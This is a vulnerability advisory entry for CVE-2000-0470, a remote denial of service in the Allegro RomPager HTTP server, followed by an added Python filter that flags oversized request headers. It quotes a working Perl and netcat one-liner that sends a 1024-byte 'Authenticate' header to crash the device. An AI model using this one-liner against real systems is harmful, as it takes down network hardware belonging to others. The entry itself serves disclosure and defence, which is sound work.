Allegro RomPager Malformed URL Request DoS Vulnerability

Vulnerability ID: 1105869
Vulnerability type: Boundary condition error
Published: 2000-06-01
Updated: 2005-05-02
CVE ID: CVE-2000-0470
CNNVD-ID: CNNVD-200006-006
Platform: Hardware
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/10237
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200006-006
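|Vulnerability details
The Allegro RomPager HTTP server contains a vulnerability. A remote attacker can cause a denial of service by means of a malformed authentication request.
|Vulnerability exploit (EXP)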
Allegro's RomPager is reported prone to a remote denial of service vulnerability.

If a specifically-malformed request is sent to Allegro's RomPager, it will crash, often crashing the parent device as well. In this manner, network hardware and possibly entire networks can be rendered unusable by any remote attacker using only a browser. 

CVE : CVE-2000-0470
BID : 1290
Other references : OSVDB:1371
Nessus ID : 19304

The following example is made available by Seth Alan Woolley:
$ ip_address="some.ip.add.ress"
$ ping $ip_address # works

the one-liner:
$ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$ip_address"'\r\nAuthenticate: " . 'A' x 1024 . "\r\n\r\n"' | nc "$ip_address" 80

$ ping $ip_address # doesn't work
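
A defensive check for the request shape described above, as an added example that is not part of the original advisory or of any vendor code: it parses a captured HTTP request and reports header values longer than a policy limit, for use in a filtering proxy or log review in front of affected devices. The 256-byte limit, the function names and the sample requests (using the documentation address 192.0.2.1) are assumptions constructed for illustration; the advisory does not state the exact length at which RomPager fails.

```python
# Added example: flag HTTP requests that carry an oversized header value,
# such as the long "Authenticate" header in the advisory above.
MAX_HEADER_VALUE = 256  # assumed policy limit, not a documented RomPager threshold


def parse_headers(raw: bytes):
    """Return (request_line, [(name, value), ...]) from raw request bytes."""
    head = raw.split(b"\r\n\r\n", 1)[0]  # tolerate a missing terminator
    lines = head.split(b"\r\n")
    request_line = lines[0].decode("latin-1")
    headers = []
    for line in lines[1:]:
        # Folded continuation lines count toward the previous header, so a
        # long value cannot be hidden by splitting it across lines.
        if line[:1] in (b" ", b"\t") and headers:
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip().decode("latin-1"))
            continue
        name, sep, value = line.partition(b":")
        if not sep:
            # No colon: keep the whole line as a nameless value so its
            # length is still measured.
            headers.append(("", line.decode("latin-1")))
            continue
        headers.append((name.decode("latin-1").strip(),
                        value.decode("latin-1").strip()))
    return request_line, headers


def oversized_headers(raw: bytes, limit: int = MAX_HEADER_VALUE):
    """List (header_name, value_length) for every value longer than limit."""
    _, headers = parse_headers(raw)
    return [(name, len(value)) for name, value in headers if len(value) > limit]


def should_block(raw: bytes, limit: int = MAX_HEADER_VALUE) -> bool:
    """True when a filtering proxy should drop the request before the device."""
    return bool(oversized_headers(raw, limit))


# Constructed sample requests (never sent anywhere by this code).
BENIGN = (b"GET / HTTP/1.1\r\nHost: 192.0.2.1\r\n"
          b"Authorization: Basic dXNlcjpwYXNz\r\n\r\n")
SUSPECT = (b"GET / HTTP/1.1\r\nHost: 192.0.2.1\r\n"
           b"Authenticate: " + b"A" * 1024 + b"\r\n\r\n")
FOLDED = (b"GET / HTTP/1.1\r\nHost: 192.0.2.1\r\n"
          b"Authenticate: " + b"A" * 200 + b"\r\n " + b"A" * 200 + b"\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspect", SUSPECT), ("folded", FOLDED)):
        print(label, should_block(req), oversized_headers(req))
```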
|References

Source: XF
Name: rompager-malformed-dos
Link: http://xforce.iss.net/static/4588.php
Source: BID
Name: 1290
Link: http://www.securityfocus.com/bid/1290
Source: BUGTRAQ
Name: 20000601 Hardware Exploit - Gets network Down
Link: http://archives.neohapsis.com/archives/bugtraq/2000-05/0398.html